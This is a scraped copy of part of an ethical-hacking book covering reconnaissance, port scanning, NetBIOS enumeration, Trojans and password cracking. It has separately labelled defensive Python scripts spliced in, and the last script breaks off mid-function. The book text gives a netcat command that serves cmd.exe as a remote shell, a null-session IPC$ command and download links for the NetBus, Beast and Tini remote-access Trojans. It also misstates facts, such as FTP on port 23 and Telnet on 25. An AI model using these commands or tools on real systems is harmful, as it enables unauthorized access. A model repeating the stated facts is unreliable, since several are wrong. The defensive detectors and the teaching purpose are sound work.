Hackdecoders - Book by Hitesh Malviya


Upload: nikola-stanisic

Post on 30-Oct-2014


Page 1: Hackdecoders- Book by Hitesh Malviya

Hackdecoders v 1.0

Official Guide to Greyhat Hacking

“If you come to know the hacker’s mind then you can’t be hacked”

Hitesh Malviya (B. Tech, C!EH, EC!SA, MCITP, CCNA)

www.brtricks.com

Page 2: Hackdecoders- Book by Hitesh Malviya

Legal Disclaimer

Any proceedings or activities related to the material contained within this volume are exclusively your liability. Misuse or mistreatment of the information in this book can result in unlawful charges brought against the persons in question. The authors and reviewers will not be held responsible in the event of any unlawful charges brought against any individuals misusing the information in this book to break the law. This book contains material and resources that can be potentially destructive. If you don’t fully comprehend something in this book, don’t study this book. Please refer to the laws and acts of your state/region/province/zone/territory or country before accessing, using or in any other way utilizing these resources.

These materials and resources are for educational purposes only. Don’t attempt to violate the law with anything enclosed herein. Neither the writer of this book, the reviewers, the publishers nor anyone else affiliated in any way is going to admit any responsibility for your proceedings, actions or trials.


Page 3: Hackdecoders- Book by Hitesh Malviya

About the Author

Hitesh Malviya is an independent information security researcher, Certified Ethical Hacker and ethical hacking trainer with a broad knowledge of the computer field. Malviya is best recognized for Hindustan Cyber Force, India’s No. 1 ethical hacking forum, of which he is the founder.

He has found serious vulnerabilities in the top social networking websites Orkut and Facebook. He is continuously working in the field of cyber security to secure most Indian domain websites.

Presently, Hitesh Malviya is working with HCF Infosec Limited as Chief Executive Officer and with RRN Technologies as a penetration tester.

Qualifications: MCP, MCTS, MCITP, CCNA, C!EH, EC!SA


Page 4: Hackdecoders- Book by Hitesh Malviya

Preface

Computer hacking is the art of exploitation. It is the way to enter into a creator’s system without his knowledge and carry out changes in his original creation. Persons involved in these activities are usually known as hackers.

Hacking doesn’t mean stealing someone’s confidential information, cracking data, cracking systems and other criminal activities. Most people misunderstand us as criminals.

Ethical hackers are those people who use their in-depth knowledge to secure companies’ and organizations’ networks from crackers. They are the cops behind crackers and black hat hackers.

At the present time, cyber threats are at their peak. Exploits are easily available on the internet; by using them any technically sound person can hack into your system or website, so awareness is a must to protect yourself from these types of cyber attacks and the latest threats.

After reading this book you will come to know about the ethical hacker’s job roles and the tactics and methods used by them to secure networks and systems. You will come to know the hacker’s mind, because once you know this you can’t be hacked.

“If you come to know the hacker’s mind then you can’t be hacked”

- Hitesh Malviya (Ethical Hacker)


Page 5: Hackdecoders- Book by Hitesh Malviya

Acknowledgements

A book or volume of this temperament is tremendously complex to write, particularly without the support of the Almighty GOD.

I express heartfelt credit to my parents Mr. O. R. Solanki and Mrs. Bhawana Solanki, without whom I have no existence. All together, I am thankful to Mr. Chandshekar Rathinam, Mr. Moin Ahmed, Arjun Tyagi, Jatin Garg, Neeraj Dhiman, Ashish Saini, all Hindustan Cyber Force crew members and all individuals who facilitated me at various stages of this volume.

To finish, I am thankful to you also, as you are reading this book. I am sure that it will play a creative and constructive role in making your digital life more secure and aware than ever before.


Page 6: Hackdecoders- Book by Hitesh Malviya

Contents at a Glance

Chapter 1 Introduction to Ethical Hacking ..... 8-10
Chapter 2 Information Gathering & Footprinting ..... 11-14
Chapter 3 Scanning & Enumeration ..... 15-25
Chapter 4 Trojans and Backdoors ..... 26-36
Chapter 5 System Hacking ..... 37-44
Chapter 6 Google Hacking (Basic & Advanced) ..... 45-51
Chapter 7 SQL Injection and Countermeasures ..... 52-66
Chapter 8 Cross Site Scripting and Countermeasures ..... 67-72
Chapter 9 Remote File Inclusion and Countermeasures ..... 73-76
Chapter 10 Email Account Cracking & Security ..... 77-85
Chapter 11 Facebook Account Hacking & Security ..... 86-94
Chapter 12 Facebook Clickjacking ..... 95-102
Chapter 13 VPN & Proxies ..... 103-113
Chapter 14 Hacking Mobile Phones, PDA, Handheld Devices ..... 114-124
Chapter 15 Career Certifications in Information Security ..... 125-131


Page 7: Hackdecoders- Book by Hitesh Malviya

Chapter 1 Introduction

Objectives:

Hacker Classes

Essential Terminologies

Ethical Hacking

Steps to perform Ethical Hacking

What Ethical Hackers Do?


Page 8: Hackdecoders- Book by Hitesh Malviya

Hacking is the art of gaining unauthorized access to computer systems and networks. The persons behind the scene are called hackers. Sometimes hacking is defined as making changes to a system’s code that lead to malicious changes in the system.

Hacker Classes

Hackers can be divided into three classes:

White Hat: These are the security guys; they work as security consultants to secure company networks from cyber threats and attacks. They provide solutions to defend against cyber threats. They are also known as ethical hackers.

Black Hat: These are the bad guys; they use their skills in a destructive manner. They are highly skilled technology geeks who use their skills to crack servers and networks.

Grey Hat: A hacker who works in both an offensive and a defensive manner is called a grey hat. It is considered the most sophisticated category of hacker.

Essential Terminologies

Threat: An action or event that might compromise security; a threat is a potential violation of security.

Vulnerability: The existence of a weakness in design, or an unexpected error, that can lead to an unexpected and undesirable event is called a vulnerability.

Attack: An attack is an action that violates security.


Page 9: Hackdecoders- Book by Hitesh Malviya

Exploit: An exploit is a defined way to breach security. It is used to gain unauthorized access to systems.

Ethical Hacking

Ethical hacking is the methodology for protecting against cyber threats and attacks. The persons behind the scene are called ethical hackers. Ethical hackers provide a shield to computer networks and systems to protect against cyber threats and attacks.

Steps to perform Ethical Hacking

(1) Information Gathering: This is the first step of ethical hacking. It can be performed in two ways: active and passive.

Active information gathering can be performed inside the network and passive information gathering can be performed outside the network. Various online tools and remote application tools are used for this purpose.

(2) Scanning: In this phase, scanning for live hosts is performed using port scanners. Nmap is one of the best tools used for scanning by ethical hackers.

(3) Gaining Access: This is the penetration phase; the hacker exploits a vulnerability to gain access to the system.

(4) Maintaining Access: The hacker changes ownership of the system in this phase and installs a backdoor on the system for further access.

(5) Clearing Tracks: Clearing tracks refers to the activity of cleaning all log files from the compromised system. Various log cleaners are used for this purpose.


Page 10: Hackdecoders- Book by Hitesh Malviya

What Ethical Hackers Do?

“If you know the enemy and know yourself, you need not fear the result of a hundred battles”

- Sun Tzu (The Art of War)

Ethical hackers try to answer the following questions:

What can an intruder (attacker) see on the target system? (Information gathering and scanning phases)

What can an intruder do with the information? (Gaining access and maintaining access phases)

Does anyone at the target notice the intruder’s attempts or successes? (Covering tracks phase)


Page 11: Hackdecoders- Book by Hitesh Malviya

Chapter 2 Information Gathering

Objectives:

Information Gathering Methods

IP Address Lookup

Extracting archive of website

Mobile number Lookup

Email spiders


Page 12: Hackdecoders- Book by Hitesh Malviya

Information gathering is the first step towards hacking any system or company network. You need to gather information about the system or company network before launching an attack.

Search engines such as Google, Yahoo and Bing can also be used for information gathering. The use of the Google search engine to retrieve information is known as Google hacking. Yahoo People and Google Groups have also proved helpful for retrieving information about any person or organization.

Information Gathering Methods

Domain Name Lookup & Whois: Finding information about a particular domain name is called a domain whois lookup; several websites provide this service. We just have to provide the domain name, and the lookup utility will retrieve all information about the domain and the domain administrator. Some websites which provide this utility:

http://www.whois.com/
http://who.is/
http://www.networksolutions.com/whois/index.jsp


Page 13: Hackdecoders- Book by Hitesh Malviya

We can also use tools for this purpose. Here are some tools with download links:

SmartWhois - Download Link: http://download.cnet.com/SmartWhois/3000-2085_4-10059497.html

ActiveWhois - Download Link: http://download.cnet.com/Active-Whois/3000-2085_4-10205156.html

CountryWhois - Download Link: http://www.softpedia.com/progDownload/CountryWhois-Download-39324.html

DNS Lookup: A DNS lookup utility is used for finding information about the DNS records and name servers of any particular domain.

NSLOOKUP Command: nslookup is a built-in command line tool used for retrieving information about DNS records. A few parameters are used in the process of gathering DNS information. Start nslookup, set the record type, then enter the domain name:

(1) To retrieve the authoritative name server (NS) records:
    nslookup
    > set type=ns
    > domain name

(2) To retrieve information about Mail Exchange (MX) server records:
    nslookup
    > set type=mx
    > domain name

(3) To retrieve information about CNAME records:
    nslookup
    > set type=cname
    > domain name

(4) To retrieve information about all DNS records:
    nslookup
    > set type=any
    > domain name

Here are some websites which provide online tools for DNS lookup:
http://www.dnswatch.info/
http://www.dnsstuff.com/


Page 14: Hackdecoders- Book by Hitesh Malviya

IP address Lookup:

An IP address always plays an important role in the commission of a cyber crime. We can get information about an IP address using some online tools:

http://www.ipgetinfo.com/
http://ip-lookup.net/

Extracting archive of website:

You can get all information about a company’s website since the time it was launched at www.archive.org. You can also use the cache option in Google search results to get archived copies of the website.

Mobile Number Lookup:

You can get information about any mobile number (location, service provider, GPS location etc.) by using these online tools:

http://www.internet4mobile.com/mobile_number_information.aspx
http://www.india-cellular.com/mobile-number-locator.aspx
http://www.phonecellnumberlookup.com/
http://www.trace.bharatiyamobile.com/

Email Spiders:

An email spider is an application used to retrieve all email addresses inside a particular website. It is used for gathering information about working email addresses of any company.


Page 15: Hackdecoders- Book by Hitesh Malviya

Here are some email spider tools:

Power Email Collector tool - Download link: http://www.filebuzz.com/findsoftware/Power_Email_Collector/1.html


Page 16: Hackdecoders- Book by Hitesh Malviya

Chapter 3 Scanning & Enumeration

Objectives:

Port scanning

Network scanning

Vulnerability scanning

Banner grabbing

Scanning using Nmap

Enumeration

NetBIOS Enumeration

Enumerating user accounts


Page 17: Hackdecoders- Book by Hitesh Malviya

Scanning is performed as a preliminary step before launching an attack. Scanning is performed to find the following information about the system:
Specific IP addresses
Operating systems
System architecture
Services running on the system

Various scanners are used for this purpose. Types of scanning:
(1) Port scanning
(2) Network scanning
(3) Vulnerability scanning

Port Scanning

Port scanning is performed for intelligence gathering about open ports on the system. Each service occupies a fixed port number to run. Here are some services and the port numbers they run on:

HTTP 80
FTP 23
TELNET 25
TCP 135, 139, 445
HTTPS 443

Port scanning is used by hackers to get information about unknown ports on the system; by using these ports they can gain access to the system.
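On the defending side the scan described above shows up as one source address touching many distinct ports on a host in a short time. The following Python script is an added example and not part of the book: it parses constructed firewall log lines (the log format and the addresses are invented for the example) and raises an alert when a source hits eight or more distinct ports on one host within sixty seconds. It labels ports with the IANA-registered service names (FTP 21, Telnet 23, SMTP 25), which differ from the table above.

```python
"""Detect port-scan behaviour in firewall logs (added example, not from the book)."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log in an invented format:
# <ISO timestamp> <ALLOW|DENY> <src ip> -> <dst ip>:<dst port>/<proto>
SAMPLE_LOG = """\
2014-10-30T10:00:01 DENY 203.0.113.7 -> 192.0.2.10:21/tcp
2014-10-30T10:00:01 DENY 203.0.113.7 -> 192.0.2.10:22/tcp
2014-10-30T10:00:02 DENY 203.0.113.7 -> 192.0.2.10:23/tcp
2014-10-30T10:00:02 DENY 203.0.113.7 -> 192.0.2.10:25/tcp
2014-10-30T10:00:03 ALLOW 203.0.113.7 -> 192.0.2.10:80/tcp
2014-10-30T10:00:03 DENY 203.0.113.7 -> 192.0.2.10:135/tcp
2014-10-30T10:00:04 DENY 203.0.113.7 -> 192.0.2.10:139/tcp
2014-10-30T10:00:04 ALLOW 203.0.113.7 -> 192.0.2.10:443/tcp
2014-10-30T10:00:05 DENY 203.0.113.7 -> 192.0.2.10:445/tcp
2014-10-30T10:00:05 DENY 203.0.113.7 -> 192.0.2.10:3389/tcp
2014-10-30T10:00:07 ALLOW 198.51.100.4 -> 192.0.2.10:443/tcp
2014-10-30T10:00:09 ALLOW 198.51.100.4 -> 192.0.2.10:443/tcp
2014-10-30T10:01:30 ALLOW 198.51.100.9 -> 192.0.2.10:80/tcp
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>ALLOW|DENY) (?P<src>[\d.]+) -> "
    r"(?P<dst>[\d.]+):(?P<port>\d+)/(?P<proto>\w+)$"
)

# IANA-registered names for the ports the chapter's table mentions.
WELL_KNOWN = {21: "ftp", 22: "ssh", 23: "telnet", 25: "smtp", 80: "http",
              135: "msrpc", 139: "netbios-ssn", 443: "https",
              445: "microsoft-ds", 3389: "ms-wbt-server"}


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {"ts": datetime.fromisoformat(m["ts"]), "action": m["action"],
            "src": m["src"], "dst": m["dst"], "port": int(m["port"]),
            "proto": m["proto"]}


def detect_scans(log_text, window_seconds=60, port_threshold=8):
    """Return one alert per (src, dst) pair that touched at least
    port_threshold distinct destination ports inside any window of
    window_seconds. Both allowed and denied packets count: a scan is
    about breadth of ports, not about whether each probe succeeded."""
    by_pair = defaultdict(list)
    for line in log_text.splitlines():
        event = parse_line(line)
        if event:
            by_pair[(event["src"], event["dst"])].append(event)

    alerts = []
    for (src, dst), events in by_pair.items():
        events.sort(key=lambda e: e["ts"])
        for i, start in enumerate(events):
            # All events from this one forward that fall inside the window.
            in_window = [e for e in events[i:]
                         if (e["ts"] - start["ts"]).total_seconds() <= window_seconds]
            ports = sorted({e["port"] for e in in_window})
            if len(ports) >= port_threshold:
                alerts.append({"src": src, "dst": dst, "ports": ports,
                               "services": [WELL_KNOWN.get(p, "unknown") for p in ports],
                               "first": start["ts"], "last": in_window[-1]["ts"]})
                break  # one alert per pair is enough
    return alerts


if __name__ == "__main__":
    for alert in detect_scans(SAMPLE_LOG):
        print(f"{alert['src']} scanned {alert['dst']}: {len(alert['ports'])} ports "
              f"between {alert['first']:%H:%M:%S} and {alert['last']:%H:%M:%S}")
        print("  ", ", ".join(f"{p}/{s}" for p, s in zip(alert["ports"], alert["services"])))
```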


Page 18: Hackdecoders- Book by Hitesh Malviya

Here are some port scanners that can be used for this purpose; you can download them from the links below and try your hand at them.

SuperScan: A windows only port scanner, pinger and resolver.

Download Link: http://www.foundstone.com/us/resources/proddesc/superscan.htm

AngryIPScanner: IP address and port Scanner.

Download Link: http://www.angryziber.com/ipscan/


Page 19: Hackdecoders- Book by Hitesh Malviya

UnicornScan: Not your mother’s port scanner. http://www.unicornscan.org/

Scanrand: An unusually fast stateless network service and topology discovery system. http://www.doxpara.com/

Network Scanning

Network scanning is the way of gathering intelligence about alive and dead hosts in the network. Various network scanners are used for this purpose. We can also use the ping command for finding active hosts on the network.

Here are some network scanners with download links; you can use these for network scanning.

SoftPerfect Network Scanner

It is a free multi-threaded IP, NetBIOS and SNMP scanner with a modern interface and many advanced features. It is intended for both system administrators and general users interested in computer security. The program pings computers, scans for listening TCP/UDP ports and displays which types of resources are shared on the network (including system and hidden).

Download Link: http://www.softperfect.com/download/freeware/netscan.exe


Page 20: Hackdecoders- Book by Hitesh Malviya

Solarwinds Engineer’s toolset

It includes 49 powerful network management, monitoring and troubleshooting tools to easily and effectively manage your network.

Download Link: http://download.cnet.com/SolarWinds-Engineer-s-Toolset/3000-2651_4-10764878.html

Vulnerability Scanning

It is the automated process of identifying vulnerabilities in computer systems present in a network. Some vulnerability scanners can be used for this purpose. Here are some vulnerability scanners with download links below:

SAINT

SAINT is another commercial vulnerability assessment tool (like Nessus, ISS Internet Scanner, or Retina). It runs on UNIX and used to be free and open source, but is now a commercial product.


Page 21: Hackdecoders- Book by Hitesh Malviya

Download Link: http://www.lynjonic.com/free_trial.htm

Nessus Vulnerability Scanner

Nessus is a vulnerability scanner which looks for bugs in software. An attacker can use this tool to violate the security aspects of a software product.

Features:
Plug-in architecture
NASL (Nessus Attack Scripting Language)
Can test an unlimited number of hosts simultaneously
Smart service recognition
Smart plug-ins
Up-to-date security vulnerability database


Page 22: Hackdecoders- Book by Hitesh Malviya

Download Link: www.tenable.com/products/nessus

Retina Vulnerability Scanner

It can scan every machine on the target network, including a variety of operating system platforms, networking devices, databases and third party or custom applications. It has the most up-to-date vulnerability database and scanning methodology.

Download Link: http://www.brothersoft.com/retina-network-security-scanner-223041.html

Banner Grabbing:

Banner grabbing is the technique used to grab the banner of a web server. You can get the headers of a website using this technique. The built-in telnet command line tool is used for this purpose.

Command (press Enter twice after the HEAD line to send the request):
    telnet domain name 80
    HEAD / HTTP/1.0

Scanning using Nmap

Nmap is an open source utility used for network exploration; it is designed to rapidly scan large networks. Nmap is used to carry out port scanning, OS detection, version detection, ping sweeps and many other techniques.


Page 23: Hackdecoders- Book by Hitesh Malviya

Nmap Scanning options:

-sT (TCP connect scan)
-sS (SYN scan)
-sF (FIN scan)
-sX (XMAS scan)
-sN (Null scan)
-sP (Ping scan)
-sU (UDP scan)
-sI (Idle scan)
-sW (Window scan)
-sR (RPC scan)
-sL (List/DNS scan)
-P0 (don’t ping)
-PT (TCP ping)
-PS (SYN ping)
-PI (ICMP ping)
-PM (ICMP netmask)

Download Link: www.nmap.org/download.htm


Page 24: Hackdecoders- Book by Hitesh Malviya

Enumeration

Enumeration is defined as the extraction of usernames, shares, machine names, resources and services. Enumeration is conducted in an intranet (LAN) environment.

NetBios Enumeration

NetBIOS information is the BIOS-level information of any domain over the network; once you extract NetBIOS information, you can get shares, services and all other information about the domain. NetBIOS enumeration can be performed using the following Windows built-in command line tools:

Using Net View

Net view lists all hosts present in the domain and lists all shares of an individual host in the domain.

Commands:
    net view /domain
    net view \\<some computer>

Using nbtstat

nbtstat is the built-in Windows command line tool used to display information about a computer’s NetBIOS connections and name tables.

Run: nbtstat -A <some ip address> (display protocol status and current TCP/IP connections)

Using NBT (NetBIOS over TCP/IP):
    nbtstat [-a RemoteName] [-A IPAddress] [-c] [-n] [-r] [-R] [-s] [-S] [interval]

NetBIOS Nullsessions

The null session is often referred to as the holy grail of Windows hacking. Null sessions take advantage of flaws in SMB (Server Message Block).

You can establish a connection with a Windows host by logging on with a null username and password.

DumpSec is a tool used to reveal shares over a null session with the target computer.


Page 25: Hackdecoders- Book by Hitesh Malviya

Download Link: http://www.systemtools.com/cgi-bin/download.pl?DumpAcl

Inter process communication (IPC)

Using IPC, anyone can list the shares or resources of any host in the domain over the network by creating a null session.

Command:
    c:\>net use \\<ip address>\IPC$ "" /u:""

Null sessions Countermeasures

Null sessions require access to TCP ports 139 and 445. They don’t work in Windows Server 2003. You could disable the SMB service to prevent null sessions. Another way is to restrict anonymous users by editing the registry settings.

Step 1. Open regedt32 and navigate to HKLM\SYSTEM\CurrentControlSet\Control\Lsa

Step 2. Choose Edit | Add Value
    Value name: RestrictAnonymous
    Data type: REG_DWORD
    Value: 2

Enumerating User accounts

Two powerful tools are used for this purpose: User2sid and Sid2user.

They can be downloaded at www.chem.msu.su/~rudnyi/NT/


Page 26: Hackdecoders- Book by Hitesh Malviya

Tool: GetAcct. It is also used to retrieve information about user accounts on Windows Server 2000/NT machines. It sidesteps “RestrictAnonymous=1”.

Download link: www.securityfriday.com


Page 27: Hackdecoders- Book by Hitesh Malviya

Chapter 4 Trojans or Backdoors

Objectives:

Trojans

Types of Trojans

Different ways a Trojan can get into your system

Indications of Trojan attacks

Port numbers used by some known Trojans

Some classic Trojans

Trojan detecting tools

Anti-Trojan software

Backdoor program countermeasures


Page 28: Hackdecoders- Book by Hitesh Malviya

Trojans

Trojans are small pieces of program code used to infect a computer system. A Trojan hides its presence in the infected system. The attacker sends the Trojan to the victim machine when the victim goes online. The Trojan occupies a port number on the machine to run. An attacker smartly renames the Trojan after a predefined service on the machine, after which the user can’t recognize whether the Trojan exists on the machine.

Types of Trojans

Remote access Trojan
Data sending Trojan
Destructive Trojan
DoS attack Trojan
Proxy Trojan
FTP Trojan

Different ways a Trojan can get into your system

Instant messenger applications
Internet relay chat
Attachments
Physical access
NetBIOS (file sharing)
Fake programs
Untrusted sites and freeware software

Indications of Trojan attacks

CD-ROM drawer opens and closes by itself.
Wallpaper, screensaver and theme settings change by themselves.
Computer browser goes to a strange and unknown page by itself.
Computer shuts down and restarts by itself.
Taskbar disappears and many other unusual tasks happen by themselves without user interaction.


Page 29: Hackdecoders- Book by Hitesh Malviya

Port Number use by some known Trojans

Back Orifice: UDP 31337 or 31338
DeepThroat: UDP 2140 or 3150
NetBus: TCP 12345 or 12346
Whack-a-mole: TCP 12361 or 12362
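A defender can check a host for the listening ports in the table above from plain netstat output. The Python below is an added example, not from the book; the netstat lines are constructed, and the port table adds Tini’s port 7777 from its description later in this chapter. A port match is only a hint, since legitimate software can use any port: confirm which process owns the socket (for instance with TCPView, listed under the detection tools below) before acting.

```python
"""Check netstat output for the Trojan ports listed in the book (added example)."""
import re

# Port table from the chapter; Tini (7777) is added from its own description.
TROJAN_PORTS = {
    ("udp", 31337): "Back Orifice", ("udp", 31338): "Back Orifice",
    ("udp", 2140): "DeepThroat", ("udp", 3150): "DeepThroat",
    ("tcp", 12345): "NetBus", ("tcp", 12346): "NetBus",
    ("tcp", 12361): "Whack-a-mole", ("tcp", 12362): "Whack-a-mole",
    ("tcp", 7777): "Tini",
}

# Matches Windows "netstat -an" rows: proto, local addr:port, foreign addr:port, state.
NETSTAT_RE = re.compile(
    r"^\s*(?P<proto>TCP|UDP)\s+(?P<laddr>\S+):(?P<lport>\d+)\s+"
    r"(?P<faddr>\S+):(?P<fport>\d+|\*)(?:\s+(?P<state>[A-Z_]+))?\s*$"
)

# Constructed sample output; addresses are documentation ranges, not real hosts.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING
  TCP    192.0.2.5:49152        198.51.100.20:7777     ESTABLISHED
  TCP    192.0.2.5:49160        198.51.100.30:443      ESTABLISHED
  UDP    0.0.0.0:31337          *:*
  UDP    0.0.0.0:137            *:*
"""


def parse_netstat(text):
    """Return the socket rows found in netstat output."""
    rows = []
    for line in text.splitlines():
        m = NETSTAT_RE.match(line)
        if m:
            rows.append({
                "proto": m["proto"].lower(),
                "lport": int(m["lport"]),
                "faddr": m["faddr"],
                "fport": int(m["fport"]) if m["fport"].isdigit() else None,
                "state": m["state"] or "",
            })
    return rows


def find_suspicious(text, table=TROJAN_PORTS):
    """Return (kind, port, name) tuples for sockets whose local listening
    port or remote connected port appears in the Trojan port table."""
    findings = []
    for row in parse_netstat(text):
        # UDP rows carry no state; a bound UDP socket is effectively a listener.
        is_listener = row["state"] == "LISTENING" or row["proto"] == "udp"
        local_key = (row["proto"], row["lport"])
        if is_listener and local_key in table:
            findings.append(("listener", row["lport"], table[local_key]))
        remote_key = (row["proto"], row["fport"])
        if row["state"] == "ESTABLISHED" and remote_key in table:
            findings.append(("connection", row["fport"], table[remote_key]))
    return findings


if __name__ == "__main__":
    for kind, port, name in find_suspicious(SAMPLE_NETSTAT):
        print(f"{kind:10s} port {port:<6d} matches {name}; confirm the owning process")
```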

Some Classic Trojans

Tini:

Tini is a small Trojan program which is only 3 KB in size and written in assembly language. Tini only listens on port 7777 and runs a command prompt when someone attaches to this port. An attacker can telnet to the Tini server on port 7777 from the Tini client.

Download Link: http://ntsecurity.nu/toolbox/tini


Page 30: Hackdecoders- Book by Hitesh Malviya

NetBus

NetBus is a Win32-based Trojan program. Like Back Orifice it allows a remote user to access and control the victim machine over its internet link. This malware is known as Backdoor.Netbus.

Download link: http://www.filestube.com/4c22b3aa2987df5503e9,g/netbus.html

Netcat

Netcat is called the Swiss army knife of networking tools. It provides a basic TCP/UDP networking subsystem that allows users to interact manually or via script with network applications. It has built-in source routing capabilities.

Netcat client/server commands:

    Client end: c:\>nc <ip> <port>
    Server end: c:\>nc -L -p <port> -t -e cmd.exe

Page 31: Hackdecoders- Book by Hitesh Malviya

Download Link: http://netcat.sourceforge.net/

Beast

Beast is a powerful remote administration tool (RAT) built with Delphi 7. It provides a server and a client. Once an attacker manages to install Beast on the remote machine, it acts as a server for the attacker’s machine.

An attacker can remotely administer the victim machine; he can send remote commands through the server. It is a very powerful tool, and the attacker can use many resources of the victim machine.

Download link: http://www.filestube.com/60e733eececb808203e9,g/Beast-v2-07.html


Page 32: Hackdecoders- Book by Hitesh Malviya

Trojan detecting Tools:

You can detect Trojans on the remote machine using the following tools:

TCP View

Download Link: http://download.cnet.com/TCPView/3000-2094_4-10796077.html

Msconfig utility


Page 33: Hackdecoders- Book by Hitesh Malviya

Windows built-in command, accessed through the Run window.

HijackThis

Download Link: http://download.cnet.com/Trend-Micro-HijackThis/3000-8022_4-10227353.html

Super system Helper tool


Page 34: Hackdecoders- Book by Hitesh Malviya

Download Link: http://www.filestube.com/7M84mA9A5TaJQhTJxTcXQR/Super-System-Helper-Tool-EXE.html

Anti-Trojan Software:

TrojanHunter

Download Link: http://download.cnet.com/TrojanHunter/3000-8022_4-10703997.html

Spyware Doctor


Page 35: Hackdecoders- Book by Hitesh Malviya

Download Link: http://download.cnet.com/Spyware-Doctor/3000-8022_4-10377263.html

Comodo BOclean

Download Link: http://comodo-boclean.en.softonic.com/download

Backdoor programs countermeasures

Most commercially available tools detect backdoor programs before they can cause damage. Educate people not to install applications downloaded from the internet or email attachments. File integrity checking can be used to detect backdoor programs on the remote machine.

Tripwire

Tripwire is a system integrity verifier (SIV). It periodically scans all monitored files, and if any modification has occurred an alarm is raised.


Page 36: Hackdecoders- Book by Hitesh Malviya

Download Link: http://sourceforge.net/projects/tripwire/

MD5sum

MD5sum.exe is a checksum utility. It takes an MD5 digital snapshot of system files. You can check a suspected file’s MD5 against the snapshot checksum.

Command: md5sum *.* > md5sum.txt
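The file-integrity approach behind Tripwire and the md5sum snapshot above can be reproduced in a few lines. The following Python is an added example, not the book’s or Tripwire’s code: it builds a per-file digest baseline, stores it as JSON, and reports added, removed and modified files, using SHA-256 rather than MD5 because MD5 collisions are practical today. The directory contents in demo() are constructed for the example.

```python
"""File-integrity baseline and verification (added example, not Tripwire's code)."""
import hashlib
import json
import os
import tempfile


def hash_file(path, algo="sha256"):
    """Digest one file in chunks so large binaries do not need to fit in memory."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root, algo="sha256"):
    """Map every regular file under root (path relative to root, '/' separated)
    to its digest. Taken on a known-clean system, this is the snapshot the
    book describes for md5sum and Tripwire."""
    baseline = {}
    for dirpath, _, filenames in os.walk(root):
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = hash_file(full, algo)
    return baseline


def verify(root, baseline, algo="sha256"):
    """Compare the current tree with a stored baseline and report differences.
    Keep the baseline on read-only or offline media: an intruder who can
    alter files can otherwise alter the baseline to match."""
    current = build_baseline(root, algo)
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline
                           if p in current and current[p] != baseline[p]),
    }


def save_baseline(baseline, path):
    with open(path, "w") as f:
        json.dump(baseline, f, indent=2, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def demo():
    """Constructed scenario: snapshot a directory, then simulate a backdoor
    install (one binary patched, one tool dropped, one file deleted)."""
    with tempfile.TemporaryDirectory() as root, tempfile.TemporaryDirectory() as store:
        os.makedirs(os.path.join(root, "bin"))
        files = {"bin/svchost.exe": b"legitimate binary",
                 "bin/notepad.exe": b"editor",
                 "readme.txt": b"hello"}
        for rel, data in files.items():
            with open(os.path.join(root, *rel.split("/")), "wb") as f:
                f.write(data)
        store_path = os.path.join(store, "baseline.json")
        save_baseline(build_baseline(root), store_path)

        # Simulated intrusion after the baseline was taken.
        with open(os.path.join(root, "bin", "svchost.exe"), "ab") as f:
            f.write(b" + injected stub")
        with open(os.path.join(root, "bin", "nc.exe"), "wb") as f:
            f.write(b"dropped tool")
        os.remove(os.path.join(root, "readme.txt"))

        return verify(root, load_baseline(store_path))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```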

Download Link: http://www.pc-tools.net/win32/md5sums/


Page 37: Hackdecoders- Book by Hitesh Malviya

Chapter 5 System Hacking

Objectives:

Password Cracking

Password crackers

Keylogger

Spyware

Keylogger countermeasures


Page 38: Hackdecoders- Book by Hitesh Malviya

An attacker can access the system by gaining access to the user accounts of the remote machine. He needs to crack the passwords of user accounts to gain access to the remote system.

Password Cracking

It is the way to crack the passwords of a system. Encrypted passwords are saved in the system database. An attacker uses hacking tools to crack these encrypted passwords, and after obtaining the clear text password he can access the system. Three methods are used to crack passwords (offline attack):

Dictionary word attack

In this method, the password is found using dictionary words saved in a dictionary file. The password cracker tries different passwords from a list. It can succeed only with poor passwords. It takes very little time.

Brute-force Attack

It tries all possible combinations to find a password. It is a time-consuming method. The time to crack a password depends on the length of the password. Sometimes it takes 2-3 days to crack a password. It can be used against strong passwords.

Hybrid attack

It is the combination of dictionary word and brute-force attacks. This technique may be used when the password is a non-existing word and the attacker tries some technique to crack it.
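The three methods above correspond to three checks a password policy can apply before an attacker does. This Python, added here and not from the book, classifies a candidate password as dictionary-, hybrid- or brute-force-crackable and estimates the brute-force keyspace in bits; the small word list, the leet-speak table and the 60-bit threshold are assumptions chosen for the example.

```python
"""Password-policy checks mirroring the three cracking methods (added example)."""
import math
import re
import string

# Constructed mini word list; a real deployment loads a large dictionary file.
WORDLIST = {"password", "welcome", "admin", "letmein", "dragon",
            "monkey", "qwerty", "football", "india", "hitesh"}

# Common leet-speak substitutions undone before the dictionary check.
LEET = str.maketrans("0134$@!", "oleasai")


def charset_size(pw):
    """Size of the alphabet a brute-force attacker has to assume for pw."""
    size = 0
    if any(c.islower() for c in pw):
        size += 26
    if any(c.isupper() for c in pw):
        size += 26
    if any(c.isdigit() for c in pw):
        size += 10
    if any(c in string.punctuation for c in pw):
        size += len(string.punctuation)  # 32 printable symbols
    return size


def brute_force_bits(pw):
    """log2 of the keyspace a brute-force attack must cover; an upper bound,
    since the dictionary and hybrid checks below catch the cheap cases."""
    return len(pw) * math.log2(charset_size(pw)) if pw else 0.0


def classify(pw, wordlist=WORDLIST):
    """Which of the book's three attacks finds pw fastest:
    'dictionary' (in the list), 'hybrid' (a list word plus digits/symbols
    or leet-speak) or 'brute-force' (nothing cheaper applies)."""
    low = pw.lower()
    if low in wordlist:
        return "dictionary"
    core = re.sub(r"^[\d\W_]+|[\d\W_]+$", "", low)  # strip 123 / !! padding
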